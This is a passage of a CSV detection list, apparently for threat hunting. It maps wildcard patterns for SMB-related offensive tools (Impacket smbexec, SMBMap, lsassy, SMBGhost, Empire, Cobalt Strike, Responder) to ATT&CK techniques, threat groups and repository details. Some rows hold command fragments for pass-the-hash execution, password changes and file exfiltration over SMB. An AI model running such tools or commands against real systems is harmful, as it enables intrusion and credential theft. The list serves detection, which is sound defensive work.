T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*smb_ms17_010_pass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_pipename_stager*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*smb_rras_erraticgopher.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_shadow.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_shadow.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_stealth.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*smb_win.py*","offensive_tool_keyword","SMBGhost_RCE_PoC","RCE PoC for CVE-2020-0796 SMBGhost","T1210 - T1059 - T1505 - T1021 - T1027","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/chompie1337/SMBGhost_RCE_PoC","1","1","N/A","N/A","10","1264","355","2020-07-02T18:51:47Z","2020-06-02T00:14:47Z" +"*smb1_anonymous_connect_ipc*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*smb1_anonymous_login*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-smb2support --remove-mic --shadow-credentials --shadow-target *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*smbattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*smbattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*smbclient \\\\\\\\*\\\\TRANSFER -N -p * -c \*put *","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*smbcrawler*","offensive_tool_keyword","smbcrawler","SmbCrawler is a tool that takes credentials and a list of hosts and crawls through those shares","T1077 - T1021 - T1110 - T1083","TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement - Collection","https://github.com/SySS-Research/smbcrawler","1","1","N/A","N/A","2","129","13","2023-05-14T06:48:40Z","2021-06-09T19:27:08Z" +"*SMBeagle.exe*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*SMBeagle.sln*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*smbeagle_*_linux_amd64.zip*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*smbeagle_*_linux_arm64.zip*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*smbeagle_*_win_x64.zip*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*smbenum.run*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*SMBetray*","offensive_tool_keyword","SMBetray","PoC to demonstrate the ability of an attacker to intercept and modify insecure SMB connections. as well as compromise some secured SMB connections if credentials are known.","T1557 - T1562 - T1553 - T1213","TA0002 - TA0008 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/quickbreach/SMBetray","1","1","N/A","N/A","4","382","97","2018-08-17T00:45:05Z","2018-08-12T00:38:02Z" +"*-SMBExec*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*smbexec.py -hashes :*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*smbexec.py -share*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*smbexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*SMBGhost.pcap*","offensive_tool_keyword","SMBGhost","Simple scanner for CVE-2020-0796 - SMBv3 RCE.","T1210 - T1573 - T1553 - T1216 - T1027","TA0006 - TA0011 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ollypwn/SMBGhost","1","1","N/A","N/A","7","647","206","2020-10-01T08:36:29Z","2020-03-11T15:21:27Z" +"*smbmap -*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*smbmap -u guest -H *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*smbmap.py *","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*smbmap.smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*smbmapDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*smbmap-master*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*SMBNTLMChallenge*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SMBNTLMChallenge*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SMBNTLMResponse*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*smbpasswd.py -newpass *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*smbpasswd.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*SMBRelay.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*SMBRelayChallenge*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - 